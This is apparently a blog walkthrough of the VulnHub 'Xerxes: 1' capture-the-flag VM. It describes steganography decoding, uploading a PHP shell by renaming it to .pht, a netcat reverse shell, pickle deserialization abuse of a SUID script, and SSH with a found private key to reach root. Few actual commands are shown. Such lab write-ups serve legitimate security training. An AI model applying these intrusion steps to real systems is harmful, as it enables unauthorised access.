Welcome to the Cyber Sploit CTF challenge series. In this
article we will solve “Xerxes: 1” Vunnerable VM where we need to compromise the
root.
In this walk through we will see without any exploitation
how we can gain the root privilege by using our experience and knowledge.
You can download the VM from the link below.
https://www.vulnhub.com/entry/xerxes-1,58/
List of action:
-Network Scanning
-HTTP service enumeration
- Brutforcing Directory
- Decoding
- Find hint in image
- Decryption
- Capture the flags in various phases
Network scanning
We will start with the netdiscover tool to get the VM IP
address. So execute the below command in kali machine.
In this case we have got our target VM IP as : 172.16.2.103
Now lets run the network scan using nmap to discover the
services and open ports in the target VM.
nmap –A 172.16.2.103
From the nmap scan result we have got two open ports 22,80
from the target VM. Those are SSH and HTTP ports respectively. Lets navigate
the website running on port 80 from the web browser.
From the above result we did not get any kind of relevant
information so we will move to the next step.
In this step we will brute-force the directory and try to
find any clue to proceed further.
The below is the scan result.
The above scan result gives us another directory named /dev/
So lets browse the directory and see the result in web
browser.
We can see there are multiple links present in the footer.
Let’s click on by one and see the result.
The above bar code has come up the moment we have clicked on
forgot password link. Now lets try to read the barcode and get the information.
After resolving the QR code we have got a base64 encoded
value. Now we let’s decode it and get the string content.
The above value shows us “look deeper”. This is a hint to
find something deeply inside the image.
After trying various things with the image finally we have
followed the below method to discover some hidden code inside the image. Let’s
see how it will work.
First we will download the latest version of the GIMP editor
and install it in windows system. And open the image using the Open in Layers
from File menu, after that we will deselect all the layers except the alpha
layer. The goal is to find out the different pixels in Alfa layer. So Lets
start finding those pixels.
After searching for long time finally we have got the
different pixel values on the top most pixel row of the image. Let’s collect
each and every pixel value and note it down and convert those decimal values to
their ASCII values using online tool.
75 121 115 114 75 121 115 114 87 122 52 114 75 121 115 114
75 121 115 114 75 122 119 116 88 84 52 114 75 121 115 114 76 105 115 117 76 83
48 116 76 83 52 116 76 105 52 61
Now we have figured the ASCII value is nothing but the
base64 encoded value so lets decode it and see what is inside.
After the decryption we have got one more encrypted value.
This using encryption method is called BrainFuck. So let’s try to decrypt the
BrainFuck encrypted string.
Finally we have got the value 45100 from BrainFuck encrypted
message, which we can use as a password to upload a file. Let’s do this.
I have tried to upload RCE1.php file but it throws Error:
illegal file detected,
So lets try to change the file extention to pht and try again.
This time we have successfully uploaded the file in the
server. Now we have to go to the upload directory and execute the php script
with command argument to check whether this web application is vulnerable to
RCE(Remote Code Execution) vulnerability.
Bingo!! As we can see the target is vulnerable to RCE after
passing the cat command as an argument to read “etc/passwd” file content.
Since the application is vulnerable to RCE now we will run
the netcat command to get the remote access from our Kali system. For doing
that run the following command inside the VM’s browser.
Simultaneously we need to run the below command inside the
Kali system to get the remote session.
The moment we will get the reverse connection, we will
execute the below one liner python code to get the limited shell access.
We have successfully got the xerxes user’s command line
shell. Now let’s go to the home directory to check the user information
available in the current system.
Accordin to the output we have got three users name,
amanpour, curtiz, delacroix. So we will start checking the content with
amanpour and so on.
Here we have got .bash_history file, next we will check the
content of the file.
Inside the file we have got the python command to get new
password, so lets execute it in our terminal to get the new password.
We have successfully get the new password. So let’s try to
connect the user amanpour using the password we have got.
We have successfully logged inside the amanpour’s account.
Now let’s search for the files with suid permission, for doing so we will
execute the below command.
Here in the output of the command we have got the file
/opt/notes. So let’s go inside the /opt directory and read the content of the
file.
After read the content of the notes.py script, we have got
the pickle module inside which is vulnerable to insecure deserialization. So we
can execute any code of our choice. Here we can load the file inside the script
so we created on file that executes the “/bin/bash”
Let’s create the below file ‘shell’ in /tmp directory with
the below content.
Let’s execute the note file and right after that run the
shell file from the /tmp directory
The moment we executed the file we have spawned a shell. After run the id command in the shell we have
got to know that the amanpour is the member of the group curtiz. So lets go to
the curtiz home directory. When we have checked the contents we have got a file
named as notes. After seeing the content of the notes, got a hint to login with
the account name called “Marie”.
After got the hint we tried to find out whether any
information present in the /etc/passwd file.
After getting the result we have figured out that Marie is
the first name of the user Delacroix and also it has a shell named with
/bin/delacroix
Let’s see the content of the /bin/delacroix file using
strings function.
From the above output we have got a md5 password. So next we
will try to decode the md5 password and get the value.
We have successfully decrypt the hash and the value we have
got is “VonBraun”. So let’s try with the password to get the ssh access of the
user Delacroix.
But we are unable to login. Now go back to the home
directory of /home/curtiz we have got a file name as id_rsa. Lets copy the
content of the file and save it in our Kali machine.
Now come back to Kali machine command prompt and try to
login with the rsa_id Private Key file through SSH.
Note: Before that set the id_rsa file permission (chmod 400
id_rsa) in our kali system.
We have entered into the Delacroix home directory. Now let’s
see the contents of this directory.
Here we have got two files named as check.sh and generate.sh.
Now let’s read the content of the files one after another and try to understand
the information given.
check.sh
generate.sh
The check.sh file generates customized login message and
generate.sh file creates a new .last file and uses the timestamp of the file to
generate a unique md5 message.
Now we need to find the md5 hash value of the .last file
creation time. So first we will see the timestamp of the last file using stat
command.
We have got the timestamp. Now it’s time to convert it into
md5 value to get the password.
We have successfully get the md5 hash, using this we will
get inside the root directory and capture the flag inside.
Great!!! We have successfully get the root console. After
getting the root user privilege we have found the flag inside the /root
directory.
When we have tried to see the type of the file, we have
found that it is a .png file. Now using netcat we will move the file to our
kali machine and open it in image viewer.
Simultaneously we have to run the same netcat comman in our
kali system to listen the port 5555.
After that we will open the .png file and see the content.
Boom!! We have successfully captured the flag from the
target machine.
Thank you for reading my article so far, if you still have
any doubt on the same please write down in the comment section below. Happy
Hacking!!
0 comments:
Post a Comment